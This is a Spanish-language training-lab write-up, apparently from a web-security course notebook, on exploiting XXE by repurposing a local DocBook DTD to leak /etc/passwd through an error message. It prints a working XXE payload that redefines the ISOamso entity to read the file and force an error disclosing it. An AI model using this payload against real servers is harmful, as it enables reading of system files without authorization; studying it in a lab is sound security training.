Laboratorio: Exploiting XXE to retrieve data by repurposing a local DTD

Debo mediante el error que produza poder divulgar el /etc/passwd, vamos a ver que tal.

Bueno ya nos dieron el docbookx.dtd y ya nos dejaron la entidad ISOamso es la que usaremos para redefinir

Ya encontré el archivo en internet, esa es la entidad, pasaremos a analizarla mejor y ver como introducimos lo demás.

Si este DTD que voy a añadir en la solicitud POST me funciona significa que existe el archivo, de lo contrario si no existe me retornará un error:

<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>

Esto es lo que va en la petición POST:

<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>

¿Por que no va en el server exploit? porque en este caso estamos intentando acceder a datos locales del servidor de un DTD Interno y no tenemos la necesidad de alojar un servidor externo para alojar el documento DTD externo, en este caso añadiendo directamente el DOCTYPE en la request POST podemos ver el error que divulga el error:

Y así es cómo vimos que exitosamente se pudo obtener, con base en ello

PreviousLaboratorio: Exploiting blind XXE to retrieve data via error messages NextLaboratorio: Exploiting XInclude to retrieve files

Last updated 26 days ago